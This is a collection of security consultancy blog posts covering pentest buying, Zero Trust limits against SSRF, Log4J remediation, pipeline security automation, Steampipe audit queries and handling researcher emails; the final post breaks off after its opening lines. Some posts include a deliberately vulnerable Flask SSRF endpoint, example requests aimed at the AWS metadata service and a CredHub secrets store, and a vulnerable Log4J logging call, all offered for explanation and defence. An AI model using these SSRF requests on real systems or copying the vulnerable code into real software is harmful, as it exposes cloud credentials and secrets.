How To Buy A Pentest and Get The Most Out Of It

This is a post about how to get the most out of a penetration test and what to consider while you are in the buying process evaluating vendors.

It is inspired by a recurring theme with our penetration tests where a client will say: "Wow, you are amazing! Our past vendor didn't find all that!" Even if my first gut reaction is pride in our team and our process, I always have mixed feelings when I hear that.

On the one hand, penetration testing is always time scoped and therefore resource limited. Some testers are better at finding one kind of issue and less successful at finding others. For good vendors it is a highly skilled, human-centered activity, and it is natural that we may find things the previous tester didn't - even if they were very, very good! I'm sure sometimes firms follow us and find things that we missed.

On the other hand, most of the time I hear this comment it is because the client's last vendor was not very good and they just ran some scans and delivered the report from the scans. It's not that hard to tell this was the case, nor is it hard to avoid this type of vendor - and that is basically what this post is about.

Ultimately, because we provide excellent penetration testing, we want our clients to be informed about the buying process, the different issues that arise with vendors and what makes for a successful pen testing engagement.

Say It With Me

Lots of folks before me have said this, so let's just repeat it here:

A scan is not a penetration test.

Lots of reputable people in the security industry.

If you walk away with nothing else from this post and you're going to go procure a pentest, just make sure you get an actual pentest and not a scan. We can do a scan too - but we call it a scan and we charge a fraction of the money to do it because it costs us very little to do it. It is so frustrating to follow a company (many are well known and trusted) that just ran a scan but charged even more than we did! Not to mention the injustice of leaving all of these low hanging fruit vulnerabilities in the client's application based on a misunderstanding of the task at hand.

Scoping To Get The Most Out Of A Pentest

When we scope penetration tests, because we are spending a lot of human time looking at the system, request payloads and other parts of the system, we care about a bunch of things. Understanding scoping can help you make sure you get the coverage you want.

How many roles are there in the application? The more roles there are, the more different types of authorization gaps there could be. Consider that as part of a penetration test, we're going to replay requests to ensure that User A can't see User B's data. We're also going to test that User A can't perform Manager C's function. The more different roles there are (User / Manager here), the more scenarios there are to test.
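To make the role and authorization testing concrete, here is a minimal sketch (in Python) of the kind of replay check we are describing. The URL, token and IDs are hypothetical placeholders, not from a real engagement:

# Hypothetical sketch of an authorization replay check.
# The base URL, tokens and IDs below are illustrative placeholders.
import requests

BASE = "https://app.example.com"
user_a_token = "TOKEN_FOR_USER_A"   # a normal user's session token
user_b_doc_id = "12345"             # a document that belongs to User B

# Replay User B's request using User A's credentials (horizontal check).
resp = requests.get(
    f"{BASE}/api/documents/{user_b_doc_id}",
    headers={"Authorization": f"Bearer {user_a_token}"},
)
print(resp.status_code)  # 200 with User B's data would indicate an authorization gap

# The same idea applies vertically: replay a Manager-only action with a User token.
resp = requests.post(
    f"{BASE}/api/approvals/{user_b_doc_id}/approve",
    headers={"Authorization": f"Bearer {user_a_token}"},
)
print(resp.status_code)

Every additional role multiplies the number of these horizontal and vertical scenarios, which is why role count matters so much in scoping.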

Another consideration is the number of screens or, in an SPA, the number of interaction points. The reason this matters is that each interaction point takes a chunk of time. If you are technical, you could think about each of these as an endpoint on an API or a POST. But the idea is that each interaction needs to be evaluated in a bunch of ways to identify issues. So the more interactions there are, the more time it will take.

Similarly, the complexity of the business function can add to the time it takes to perform a test. As can the number and types of fraud paths. In a recent scoping call, we saw that the application was 98% read only. That dramatically reduces the attack surface of the test.

To summarize the scoping considerations, we might ask:

Most of the tests we do are just one, two or three weeks and focus on web applications and APIs. We offer clients a choice of size because if they perceive high risk or want to go deeper, they should have that option. If they have a limited budget and want to get the best test they can in a small scope, we try to accommodate that as well. If a client wants us to spend too little time on a large app, we reserve the right to decline because we just can't provide meaningful coverage.

[Figure: diminishing returns curve. Source: Wikipedia, https://en.wikipedia.org/wiki/Diminishing_returns#/media/File:Diminishing_Returns_Graph.svg]

Our goal is to scope so that clients get good coverage and check the things that need to be checked, without passing the point of diminishing returns where we're spending more time but not finding more things. There's no way to be sure you've covered everything and there's no certain way to know when you get to this point. Our method is based on a decade of real world experience.

We generally recommend allocating a healthy amount of time and budget for penetration testing in the spirit of conducting serious testing with a real goal of identifying real issues so they can be fixed.

A clean test can be a bad result because it doesn't signal thorough evaluation. In our experience, partners, vendors and auditors are generally ok with tests that have serious findings provided that an organization took appropriate action based on the findings and confirmed that they had been fixed.

Standard Pentest Deliverables

When we do penetration testing, our goal is to provide everything you need to get everything possible out of the test. Most people know they need a report. The report is a large PDF (we just delivered one that was 107 pages) summarizing the findings, with details about how to reproduce each finding and ideally how to fix it. We usually conduct a Read Out call with the client team to explain everything in the report and answer questions. The Read Out goes best when clients have had time to digest the report and ask questions about the details. Often that preparation isn't complete and we just walk through the report to highlight important items.

When it comes to the report, even if you think you don't care, you probably need the report. Every once in a while we will do testing where the client doesn't think they need a formal report for audit purposes; they just care about the findings and want us to report the issues directly to Jira. That is fine with us, but usually someone needs to capture the output of the test at a point in time so that when you look back in 2-5 years you can see what you did and what was found back then. The best way to do that is to get the standard report.

That being said, the report is really just the beginning. For one, we don't recommend sharing the pen test report with anyone outside your company unless you have no other choice. Our reports almost always contain sensitive information about your security posture that you can reasonably say cannot be distributed. So what we recommend sharing is a one-page executive summary that is truthful and describes the testing that was done, including the numbers of findings and key types of findings. We call this an Attestation Letter. It is intended to be shared with a third party as needed. It doesn't disclose any truly sensitive information other than the broad outcome of the testing, which by itself usually isn't sensitive. It is implied that we would have a conversation with a partner about the Attestation Letter if requested, but in 10 years nobody has ever asked us to do that.

We also include all of the raw evidence that is packageable in a supporting evidence folder. This includes the output of tools like Burp Suite, Amass, bucketfinder, nmap, dnstwist, sqlmap, etc., as we use them. We want developers that are interested to see the tools we used to collect the information. If you can do all of that part yourself, that is great. That being said, people rarely ask us anything about the raw evidence. It turns out understanding what those tools do requires some pretty expert level security knowledge...

One thing that is very informative is to look at the difference between the raw scan results in the evidence folder and the findings in the report. Since we find most of our most serious issues during manual testing, they don't show up in the tool reports. If your report matches the scan, you probably didn't get much manual analysis. Of course, vendors know this too so they don't provide the raw evidence - and on some level, you can't know that they provided all of it anyway.

After we do the readout call, most clients want to fix High and Medium severity findings and get an updated Report and Attestation Letter that reflects their progress. To do this, we need to Retest key items to confirm that the client has in fact fixed them. We don't remove things from the report, but we do update the report to reflect that the item has been retested and confirmed to be fixed. We include this in all of our pricing as something you always get - because we know most people will want it and we don't want to surprise you later with additional charges just because you didn't know to ask up front. We don't charge more for retesting or re-issuing a letter. We limit the time to retest to 90 days (with exceptions) to try to ensure that we have retestable scenarios. As code bases change, directly retesting an item can become impossible.

Summary of Deliverables:

Evaluating Pentest Vendors To Get The Best Result

There are a number of questions you can ask when you are looking at penetration testing vendors.

  1. What are the deliverables?
  2. How much will it cost?
  3. How long will it take? Do you have availability in the timeframe we need?
  4. Is retesting included?
  5. Will my team be dedicated to me during that period?
  6. What communication can I expect during the test?
  7. What type of background does the testing team have?
  8. What tools will the testing team use?
  9. How do you produce repeatable results?
  10. Can you provide an example report?
  11. Can you provide three references?
  12. Can you talk about how the assigned team's expertise maps to our application and tech stack?

One thing that is important as you compare options is that you have a clear statement of Scope so that the different vendors you talk to are quoting on the same thing.

Thinking About Incentives With Testing

There are a few topics, rarely talked about out loud, that I've become familiar with over the last 10+ years of doing penetration testing at Jemurai (and 4+ years before that), and I would like to call them out a bit.

Obviously it is in the pentest vendor's interest to have the least experienced, least highly paid person possible do the work. It is also in their interest to have a tool do most of the work for them. Pure penetration testing is a utilization business. The owners of the company get rich when utilization is high and resources are cheap.

When testing is heavily tools based, you might have a pen tester doing more than one test at once. If a tester can do more than one test at once, they can bill more clients per week. Of course, if the test is driven by expert human testers looking at how to abuse a system they can only focus on one client at a time. As a consumer, you are entitled to know which you are getting but you are unlikely to get a straight answer - so you'll have to ask good questions.

Sometimes people ask about "bug bounty" or if they can do "continuous pentesting". Frankly, I think this industry is fraught with misinformation. I have seen vendors in this space grandstand about "activity" based metrics where they produced millions of interactions over a year and had 600 researchers involved in a program. The problem is that, with incentives the way they are, you have 600 people who are mildly interested for half a day and all check the same things. Nobody is paying more for higher levels of attention or expertise in this arena. This doesn't do anything great for your security! My experience is that a good solid penetration test gives you much, much better results than these types of programs. I'm not saying you shouldn't do bug bounty or even continuous pentesting; just know what you are paying for, what you are getting, where it fits in your program and that it is fundamentally different from penetration testing.

Conclusion

The goal of this post was to demystify the penetration testing process so that you can navigate it as smoothly as possible and get the most thorough, useful test possible for your budget. We've written about related topics in The Truth About Audits on securityprogram.io. At the very least, we hope this information will help make sure you are getting what you are paying for - and not just a scan.

AppSec - Zero Trust in Zero Trust

The other day we were giving developers security training around server side request forgery (SSRF). We see this all of the time now (see this great and detailed post by our team on SSRF in Real Life). It can be shockingly damaging. In any case, during the training the developers brought up a very interesting area where it was obvious that Zero Trust had provided a false sense of security so we wanted to write about that here. We'll start with some background, then get to the story and our conclusion.

Start With Zero Trust

As a quick aside, when I was at Trustwave (2008-2012) prior to founding Jemurai, someone came up with the catchy slogan that makes for the play on words (and company name) in this section:

Security begins with trust

Leader

Let's start by trying to talk about Zero Trust in a simplified way. Beyond being a marketing term that gets used in some places where it shouldn't be (just search for Zero Trust and see which security companies AREN'T talking about it!), it generally seems to apply to a few things working together:

The result is that, at a network level, I can control at a very fine-grained level which things can connect to each other. I can allow Matt to connect to this server but not that one. I can allow this server to connect to that one. Part of the idea is that you no longer have subnets where everything inside can talk to everything else inside; on the contrary, every single connection is specifically managed and allowed or disallowed. It can all be managed via an API, and at a network layer it is very difficult to compromise. Cool tools we've used that relate to Zero Trust include CloudFlare (cloudflared), Tailscale, Teleport, StrongDM, etc. (We are not intending to endorse a tool here, just giving some examples.)

We should probably start by saying, these tools are cool and the idea behind all of this is solid.

The problem is, they are network tools, not AppSec tools. Let's talk about that more.

Why Doesn't Zero Trust Help With AppSec?

Well, it does when the network flow doesn't follow a path allowed by the Zero Trust tools. But a ton of application security vulnerabilities piggyback on existing connections to existing servers that are allowed and expected.

Let's look at a few common specific examples:

Now, Server Side Request Forgery (SSRF) is an interesting hybrid example because whether Zero Trust helps us or not depends on where we're forging the request to go to.

To put this another way, if we are forging a request to the AWS MetaData Service (eg. http://169.254.169.254/latest/meta-data/) and the Zero Trust setup of our environment doesn't allow the intermediate EC2 Instance to talk to this service, then Zero Trust has effectively prevented this SSRF attack.

However, if we use SSRF to attack something else that the application is already using, say a credential store or another micro-service, then the connection is generally allowed by Zero Trust, and Zero Trust does nothing to make us more secure against this attack.
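To make this concrete, here is a deliberately minimal, hypothetical sketch (Python/Flask) of the kind of endpoint where SSRF shows up. The route and parameter names are invented for illustration:

# Hypothetical SSRF-prone endpoint, for illustration only.
import requests
from flask import Flask, request

app = Flask(__name__)

@app.route("/preview")
def preview():
    # The server fetches whatever URL the caller supplies.
    url = request.args.get("url")
    return requests.get(url, timeout=5).text

# An attacker can point this at the metadata service:
#   /preview?url=http://169.254.169.254/latest/meta-data/
# A strict Zero Trust setup may block that hop. But pointing it at a service
# the app already talks to (a credential store, another micro-service) rides
# an allowed connection, so Zero Trust does not help there.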

A Story About SSRF

Getting back to the narrative part of this post, the inspiration for the whole thing was a moment when developers at the client asked us during training: "wait, could you use SSRF to attack CredHub or the Service Registry?"

If you're not familiar with CredHub (as we weren't) you might have had to do some digging to find the answer. CredHub is basically a Spring ecosystem centralized credential storage service. It offers API's for storing, finding and retrieving credentials. Kind of like an App level HashiCorp Vault or AWS Secrets Manager. Literally at least some of the keys to the kingdom.

OK, that sounds like an interesting service to attack with SSRF.

Can I retrieve keys through the application via an SSRF vulnerability? We weren't sure so we looked into the documentation. Turns out CredHub offers two options for authenticating requests:

  1. A bearer token based approach (a la OAuth)
  2. A Zero Trust modeled MTLS option (mutually verified certificates for TLS)

From reading the docs, it seems that as long as the intermediate server we're jumping through with our SSRF attack regularly uses CredHub and can EVER ask CredHub questions, our SSRF attack can also ask those same questions. The two servers will confirm they trust each other. But in this case, their trust will be misplaced.
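Roughly, the attack is just asking the trusted app to ask CredHub on our behalf. A hedged sketch, reusing the hypothetical /preview endpoint from above; the internal hostname and credential name are invented, while the /api/v1/data path comes from CredHub's public API documentation:

# Hypothetical: ride the intermediate app's trusted (mTLS) connection to CredHub.
import requests

target = "https://credhub.internal:8844/api/v1/data?name=/prod/db-password"
resp = requests.get(
    "https://app.example.com/preview",   # the SSRF-prone endpoint sketched earlier
    params={"url": target},
    timeout=5,
)
print(resp.text)  # if the app's client certificate is trusted, this may return a secret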

Which is why I would amend our fearless slogan creator's words to:

Security begins and ends with trust

Konda

If you trust someone you shouldn't, you've lost your security! This is part of why I dislike the term Zero Trust. You really can't create Zero Trust; you can only create Network Zero Trust. And not even that, because you're going to start building trust relationships anyway - a network with actual zero trust isn't a network!

The key takeaway from this story is that Zero Trust may not be an effective mitigation for SSRF.

Conclusion

We absolutely like the direction Zero Trust has been going and recommend solutions that simplify the Tunnel, ACL and AuthC approach we talked about above.

However, we need to be very aware of the places where SSRF happens. These seem to often include:

We also need to understand the boundaries of Zero Trust and application security. Rarely has Zero Trust played a significant role in mitigating the results of what we could do in a penetration test. That takes architecting systems well and writing secure code.

Maybe the simplest way of all to explain this is that if you have code running in systems within the boundaries of a Zero Trust network, that code also has to be trusted to maintain its integrity in its interactions with the other resources in the network. Otherwise, your awesome Zero Trust network could be spilling data.

Branding and Company Update

We recently updated the Jemurai website, modeling it after the new securityprogram.io website which we really like (shout out to our web design friends at sweetandfizzy.com who did so much more than help design the site). As we did that, we realized we needed to try to be clearer about what we do, and where we talk about it. This post aims to capture all that and make it easy to understand.

What Are The Web Sites?

It has become increasingly clear that we want to have a main company website, which is this one at jemurai.com. It is intended to unify access to information about our team, open jobs, our products, our services and all the things you'd want to know about our company. It is also where we post some technical blog posts that are driven by the software security practice.

In addition, we have several product related sites, including:

These are products of Jemurai, developed by Jemurai Labs - our R&D team. You will see posts relevant to the different product areas on the blogs for those sites - eg. The Truth About Audits on the securityprogram.io site.

So Wait, What Do You Do?

Lately, when we explain what we do, it can feel a little confusing - even for our team. So let me try to simplify our language here. We're basically developers that are interested in security. That has always been and continues to be our DNA.

So at the core of what we do are some services that help development teams build secure applications. These include:

While we do these projects, sometimes ideas pop up and become really compelling. Our cloud security work led us to build JASP. Seeing small companies pushed to answer complex security questionnaires and prove they have good security inspired securityprogram.io. The point is, the security services around software development and cloud security are at our core and put us in a position to build the systems you see above.

Supporting Remote Work Securely

On Friday we wrote a blog post that talked about remote work and security from a worker's perspective. We included a checklist. In this post, we want to develop that idea and talk about it more generally from a company and IT strategy perspective. We'll start with some pictures to illustrate some of the issues.

The content of this post is also in this google slides presentation.

A Basic Network

Consider a basic network for a classic “small” company.

When the laptop or phone at the bottom leaves the office (as when work is not on premise), everything falls apart. Identity won't work. Access to files won't work. Access to internal systems won't work. In short, in a classic pre-cloud IT model without an explicit VPN strategy, many things don't work.

A More Realistic Company Network

Most companies have more of a hybrid network.

In this network:

Tools That May Not Work

Some tools we put in place for security simply will not work the same way without adaptation.

Strategy

Building a VPN now to restore connectivity to specific internal systems may solve certain problems. It will come with oversight and will not get you back to where you started in terms of the corp network and full connectivity.

It's a little late to start talking about business continuity strategy, but anywhere that it is possible to leverage cloud based services using a shared identity (SSO) system is going to be the most resilient to specific cloud or network issues.

Therefore, we advocate that companies bite the bullet and use cloud based resources wherever possible.

Near Term

Medium Term

Long Term

Conclusion

It is time to quickly embrace the cloud and SaaS based services.

Use a risk based approach to prioritize.

Resources

Security Culture - Introducing OWASP

In the latest video of our Security Culture series we give a 2 minute overview of OWASP.org, an amazing resource for developers.

OWASP Resources

OWASP resources include:

Log4J Security Issue

This post is a quick summary around the Log4J security issues happening in December 2021.
It includes a summary, a video, a PDF of slides we presented and extensive references.

The TL;DR is: update Log4J to 2.16.0 and keep watching for subsequent updates.

The 10,000 Foot View Summary of The Issue

Log4J is a widely used Java library.

It has a problem where if it is asked to process a malicious string, it will allow
an attacker to run their own code on a targeted server. This can happen in both
authenticated (where we know the user) and unauthenticated (anonymous) cases depending
on the application.

This issue is being actively probed and attacked.

The simplest fix is to patch. I expect further developments, so I recommend watching
for additional updates.

The Rough Detail

Log4J is a logging library that is used in a wide array of applications. I probably used it in
over half of the projects I’ve worked on in my career.

It is very normal for a developer to want to log something that a user enters. For example:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

String user = getCurrentUser();
String document = request.getParameter("Document"); // attacker-controlled input
Logger logger = LogManager.getLogger(Thing.class.getName());
logger.debug("User {} requested document: {}", user, document); // vulnerable Log4J versions evaluate ${...} lookups in this value

That log statement, where the user and document values get written to the log, is where the
problem occurs. One clear problem is that these statements are basically everywhere in code and it
would be nearly impossible to audit all of them.

The fix is basically to use a version of Log4J that doesn't do the magic on the malicious
string by default. Alternatives are to tell an older version that you don't want that feature or,
in extreme cases, to rip the offending class right out of the log4j library.
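For reference, these are the common forms those fixes took at the time of writing; treat this as a sketch to adapt to your own build and deployment, not an exhaustive remediation guide:

# Preferred: upgrade log4j-core to a fixed version (2.16.0 at the time of writing)
# by bumping the dependency version in your Maven/Gradle build and redeploying.

# Older 2.x versions (2.10+): disable message lookups via a JVM flag...
java -Dlog4j2.formatMsgNoLookups=true -jar yourapp.jar

# ...or via an environment variable.
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

# Extreme case: remove the offending class from the jar entirely.
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class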

There are a variety of ways to scan for the issue and to identify log4j library versions
locally. Even a simple approach of looking at dependencies could help.
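A few quick ways to look for the library locally, as a starting point rather than a complete inventory:

# Maven / Gradle projects: check the resolved dependency tree.
mvn dependency:tree | grep -i log4j
./gradlew dependencies | grep -i log4j

# Deployed servers: look for the jar itself.
find / -name "log4j-core-*.jar" 2>/dev/null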

Timeline

The vulnerability was disclosed to the Apache Log4J security team 11/24.

It was released to the public 12/10.

Patches 2.15.0 and 2.16.0 have been released since then.

I would look in log files from November forward for malicious activity as soon as possible.

A Video

I put together this 17 minute video overview that covers:

The Slides

If you want to read and navigate yourself, the slides are here.

References

We looked at a lot of sources as we navigated this issue. Here are some that we thought were helpful:

Pipeline Security Automation

This post talks about how we approach security automation in BitBucket Pipelines. It also introduces some new open source tools we built and use in the process.

Security In Pipelines

We’ve written before about using GitHub Actions and provided an Action friendly “workflow” with our Crush tool.

At a high level, Pipelines and Actions just do some computing work for you in Atlassian or Github’s data center. Often that work is related to source code, testing, or deployment.

Both leverage containers heavily for sandboxing the work that happens in the build and provide some level of abstraction that you can use to build your own pipes or workflows.

On some level, we’re using them to do the same work we used to use Jenkins or CircleCI or Travis to do.

We like automating security in Pipelines or Actions because it makes it easy to build security into your natural development workflows.

Real World

So what are we really talking about? What do we want to have happen?

We want to be able to apply any automated tools flexibly in a controlled environment that already has our code artifacts and knows about the key events.

Triggers for actions and pipelines can be:

The tools we want to run may range from:

Of course, we can run security unit tests and trigger other integrations (eg. SonarCloud) as well.

Just remember:

Tools are necessary but must be used by skilled operators.

I can’t tell you how often I see security tools installed but not used effectively.

OK Show Us Code

Here is an example of how we have a pipeline configured:

pipelines:
  branches:
    '{securityautomation/*}':
    - parallel:
      - step:
          name: Run Crush
          image: golang:1.16
          script:
            - go get -u github.com/jemurai/crush@v1.0.5
            - crush examine --threshold 7 . > crush.json
          artifacts:
            - crush.json
      - step:
          name: Dep Check
          image: openjdk:8
          script:
            - wget https://github.com/jeremylong/DependencyCheck/releases/download/v6.1.5/dependency-check-6.1.5-release.zip
            - unzip dependency-check-6.1.5-release.zip
            - rm dependency-check-6.1.5-release.zip
            - ./dependency-check/bin/dependency-check.sh --failOnCVSS 6 --exclude **/dependency-check/**/*.jar -f JSON --prettyPrint --scan .
          artifacts:
            - dependency-check-report.json
    - step:
        name: Report
        image: golang:1.16
        script:
          - go get -u github.com/jemurai/depcheck2off@v1.0.0
          - go get -u github.com/jemurai/off2jira@v1.0.0
          - depcheck2off ./dependency-check-report.json > ./depcheck.off.json
          - off2jira ./depcheck.off.json
          - off2jira ./crush.json

Let’s walk through it and talk about what is happening.

First, the branches part tells BitBucket when to run the pipeline. In this case, it will be on any push to a branch under securityautomation.

branches:
    '{securityautomation/*}':

We like doing this because it helps to isolate your security related changes and ensures that what you are finding doesn’t break other builds. In the long run, we want to have security tooling run more often.

Then we need to understand that there are three steps defined in the pipeline:

Crush and Dependency Check are both code analysis tools, so they can run in parallel. Hence the parallel: before their step: definitions.

To run Crush, we pull a base golang image (image: golang:1.16), install Crush and run it. We drop the output into an artifact, which means it will be available later.

- step:
    name: Run Crush
    image: golang:1.16
    script:
        - go get -u github.com/jemurai/crush@v1.0.5
        - crush examine --threshold 7 . > crush.json
    artifacts:
        - crush.json

Running Dependency Check is similar. You can see that we’re pulling a release from GitHub and unzipping it. This is on an openjdk image. Then we invoke dependency check and put the report in an artifact.

- step:
    name: Dep Check
    image: openjdk:8
    script:
        - wget https://github.com/jeremylong/DependencyCheck/releases/download/v6.1.5/dependency-check-6.1.5-release.zip
        - unzip dependency-check-6.1.5-release.zip
        - rm dependency-check-6.1.5-release.zip
        - ./dependency-check/bin/dependency-check.sh --failOnCVSS 6 --exclude **/dependency-check/**/*.jar -f JSON --prettyPrint --scan .
    artifacts:
        - dependency-check-report.json

The next part “Report” is interesting and we’re going to put it in a whole new section.

Reporting and Rethinking Security Tooling

Once we have Crush and Dependency Check output, we want to do something with it. We could leave it in BitBucket as an artifact and refer to the plain text file. That is better than not running the tools, but we also want to make these findings visible and integrate them into our normal processes.

Here’s how that looks in the pipeline we defined where we’re pushing the issues identified by Crush and OWASP Dependency Check to JIRA:

- step:
    name: Report
    image: golang:1.16
    script:
       - go get -u github.com/jemurai/depcheck2off@v1.0.0
       - go get -u github.com/jemurai/off2jira@v1.0.0
       - depcheck2off ./dependency-check-report.json > ./depcheck.off.json
       - off2jira ./depcheck.off.json
       - off2jira ./crush.json

Here we are installing and using two new golang based tools:

The basic philosophy is to build small tools that do one thing and do it in a simple and predictable way. This goes directly against our own past approach with OWASP Glue which we retired.

With Glue, you could run different tools and push the output to a variety of trackers. The problem was that you ended up with a JVM, Python, Ruby, Node and an ever-growing Docker image. That made it hard to incorporate into pipelines efficiently. We also had to maintain everything and keep everything working to get an update pushed. It was a monolith.

With the Jemurai autom8d set of tools, we’re taking more of a classic Unix philosophy and building small purpose built utilities that can be put together in a number of ways.

So far we have:

We already have plans to build:

We also want to adapt and integrate some other code we have that does an inventory and metrics across repositories.

We’d love to hear from you about others that would be useful! We can help with this type of automation while doing so with open tooling you can leverage for the long term.

Leverage Pipelines

The great thing about pipelines (and actions) is that once you understand them, you can effectively push security tooling to a large number of projects quite easily.

Note that there are compute charges associated with running pipelines (or actions).

We have also had good success helping companies who leverage BitBucket or GitHub cloud because we can actually help commit the code that starts the automation project off. Combined with some training and a retained ongoing support setup - we can enable clients to very quickly improve their internal app security posture.

References

Cloud Security Auditing With Steampipe

This post talks about how we use different tools to accomplish different tasks in a cloud security context, zooming in on Steampipe as a tool that should make it very easy to prepare for and meet audit requirements.

Cloud Security Auditing

There are a couple of different things that we think of when we think of cloud security auditing.

One is a pure security activity of checking all of the configuration details on all of the services we are using to make sure they are configured properly.

Another is to support an external audit that somehow proves that we are doing the right thing across our infrastructure.

With SOC 2 and other audits, we are increasingly seeing tools introduced that supposedly help to magically speed up the audit process. As may be obvious already, I’m skeptical.
The idea that AI is going to magically help us with cloud security is laughably naive.

The cool thing about Steampipe, and really what the cloud APIs themselves enable, is that we can do a lot of that inventory and preparation ourselves.

Spoiler: the tool can’t help you be secure, you have to do the work.

Finding Problems

Some tools are good at finding issues. I would categorize Prowler and ScoutSuite in this group. You run them to identify issues and they help you find problems. They are both open source and very useful. We built a commercial tool like this called JASP - so we know a thing or two about how these tools work and what they are good for and not good for.

JASP makes it basically as simple as possible to get everything running, keep it running consistently and provide reporting over time and alerting around issues.

Steampipe also supports checks against several CIS Benchmarks, including AWS, Azure and GCP.

Getting these running is easy for a DevOps person who is already using a CLI with any of these tools. So you can use Steampipe to do your “problem finding.”

There are commercial tools (including from the cloud providers) for finding problems too. Generally,
I feel they are not used very effectively and if you’re looking to find problems in your environment you might as well start with open source options. You need to understand them and the output to fix anything anyway.

On the downside, all of these tools produce huge lists of problems and lack context of the environment, including how the pieces fit together and what really is a security issue.

You can use these tools to prepare for an audit like a SOC 2, but they will likely have you doing a whole lot of extra cleanup work the auditor won't ask about, and they might miss simple things the auditor really does care about - like whether users are in the correct privileged IAM roles.

Finding What Is

Building an inventory of your systems is outside the scope of the tools that find problems. If a system has an issue it will show up in the report but if it doesn’t, it won’t.

So when it comes to doing an audit, if the auditor says they want a list of EC2 instances, that may not be easy to supply. Not to mention the fact that you want to know what you have before you start the audit.

You can use native tools like AWS Config to keep track of what you have. You can use the GUI to do this work too, taking screenshots of the configuration. But this is kind of painful.

Enter Steampipe. With Steampipe, you can basically write queries against your accounts to list resources - including properties you might want to check.

For example, the following will show users without MFA:

select user_id, name, password_last_used, mfa_enabled
from aws_iam_user
where not mfa_enabled;

I can query databases, EC2 instances, all kinds of things through Steampipe, which basically provides a SQL interface on top of the AWS APIs.

A more detailed example is being able to query EC2 instances that have unencrypted volumes attached.

select
  i.instance_id,
  vols -> 'Ebs' ->> 'VolumeId' as vol_id,
  vol.encrypted
from
  aws_ec2_instance as i
  cross join jsonb_array_elements(i.block_device_mappings) as vols
  join aws_ebs_volume as vol on vol.volume_id = vols -> 'Ebs' ->> 'VolumeId'
where
  not vol.encrypted;

Cool, right!

Unified Process

Something that is awesome about Steampipe is that it supports a lot of services through plugins, including AWS, GCP, Azure, Slack, Zoom, Alibaba, CloudFlare, DigitalOcean, Jira, Kubernetes, Shodan, Zendesk and more. It also has mods that implement checks against the data it can collect.

So I can use a plugin and then build queries to talk to all of these services and have a unified process for doing inventory and auditing. Once I know how to use it, I can really get a process in place quickly.

Own Your Tools and Actively Look

One of my favorite things about Steampipe is that you can (and we do) wrap the queries in scripts (in our case python) that allow us to run a series of queries and essentially translate audit requests for evidence into scripts that we can tweak and automate on the fly.
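As a rough illustration of what that wrapping looks like, here is a minimal Python sketch; the query names and file names are placeholders, and it assumes the steampipe CLI is installed and your AWS connection is configured:

# Minimal sketch: run a set of Steampipe queries and save the JSON output
# as audit evidence. Query names and output file names are illustrative placeholders.
import subprocess

QUERIES = {
    "iam_users_without_mfa":
        "select user_id, name from aws_iam_user where not mfa_enabled;",
    "ec2_inventory":
        "select instance_id, instance_type, tags from aws_ec2_instance;",
}

for name, sql in QUERIES.items():
    result = subprocess.run(
        ["steampipe", "query", sql, "--output", "json"],
        capture_output=True, text=True, check=True,
    )
    with open(f"evidence_{name}.json", "w") as f:
        f.write(result.stdout)
    print(f"wrote evidence_{name}.json")

When the auditor asks for "a list of EC2 instances" or "users without MFA", the evidence request becomes one more query in the dictionary.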

Ultimately, I believe that if you’re going to have developers or ops folks anywhere on the spectrum of DevOps managing your infrastructure, these are the types of tools and approaches that empower them to secure your environment and crush your audit.

I don’t know anyone at Turbot or who works on Steampipe, but I’m excited about recommending it for these types of proactive tech security projects.

References

Email from a Security Researcher

Yesterday, for the Nth time, a client had a “security researcher” send an email about a “high-impact” security vulnerability. I’ve crafted this response a few times so I figured I would blog about it.

Email from a Security Researcher

So here’s the email:

Hi <name>,

I'm <"researcher" name>, a penetration tester, and I have found a high-impact security vulnerability in the <company name> web app.

How can I report the issue details? Also, I'm inquiring if you reward reporting valid vulnerabilities.

Thanks, <"researcher" name>

Digression About Vulnerability Disclosure Programs

In general, I’m a fan of having a vulnerability disclosure program. Fundamentally, a disclosure program has to outline rules of engagement for reporting a vulnerability and a timeline for expecting a response. It might or might not involve a reward. The program should include some sort of scope.

This is positive, because often folks that are interested in software tinker with it (hack it) and find things that are important. Before disclosure programs and bug bounties, there was a lot of hostility to "hackers" who reported these kinds of issues - and so sometimes those issues would get sold into the zero day market. A disclosure program presents a company's positive attitude toward researchers reporting issues and gives a framework for it to happen in a trustworthy way.

I’m also a fan of bug bounty programs, which are similar but generally imply that there is a reward for a reported vulnerability, a more explicit scope and a sense of what types of vulns may or may not be reported. Bug Bounty programs are often intermediated by firms like BugCrowd or HackerOne.

I have met a bunch of folks that are very active in this particular security community, and I’ve run bounty programs at large companies. There are a lot of great people here.

As others have stated previously more eloquently than I will, there are times and places to start a bounty program.

The TL;DR of which seems to be: bug bounties are great when you've got basic hygiene figured out and you have a way to handle an ongoing volume of reports.

Otherwise, you might just get inundated with information you don’t know how to deal with and only very little of which is realistically important to your security.

The Gory Detail

The truth is, these types of emails are common and often a result of someone opportunistically scanning for issues and hoping to make a little money.

They frequently identify issues such as missing X-Frame-Options HTTP headers or similar. Often, they are actually low or even informational severity, contrary to what the researcher’s email says.

Now, if the person is a legit security researcher letting you know about a problem, you want to thank them and give them a way to share what they know and ideally give them something in return. A researcher might accept recognition or swag. In the long run, we want to make these legitimate and commensurate with the value of the identified issue. I have seen researchers submit amazingly useful findings.

The problem is that most of these submissions, especially when framed like the one above, are not significant security findings at all and they are being used to SPAM a large number of companies with the hope that some will pay.

I have also seen “researchers” turn into extortionists who publicly complain about the way a company handles a minor problem in order to get attention and a reward.

To respond effectively, we want to engage the earnest researcher while shutting down the discussion with the extortionist.

I recommend responding with something like this email template:

Hi there,

Thank you for reaching out. We do not currently have a vulnerability disclosure program, reward program or bug bounty in place.

That being said, we have folks on the team that have been involved in those types of programs and know how to run them and it is something we may do in the future.

If you would like to report the issue to this security@ email, we will track it in good faith and consider providing some kind of award or recognition if we can.

At the same time, having run these programs in the past, we also know that there are a lot of folks out there who run scanners and submit the results to try to claim rewards. Those types of findings aren’t the type of issues that our program can reward.

We certainly appreciate the security community and understand the value of a mutually positive model for interaction. We’re committed to engaging with integrity.

We look forward to hearing from you.

Thank you,
Security

Of course, you have to actually engage with integrity and track the issue. If you do start a program, you should reward the researchers that reported real findings. You also have to communicate with researchers and fix issues.

Epic Security Failure and Risk

All I could do was facepalm after somebody pointed me to an article about how Microsoft unleashed a death star on hackers …

"Microsoft unleashes 'Death Star' on SolarWinds hackers in extraordinary response to breach" GeekWire Article

Let’s talk about failure.

Start with Sympathy

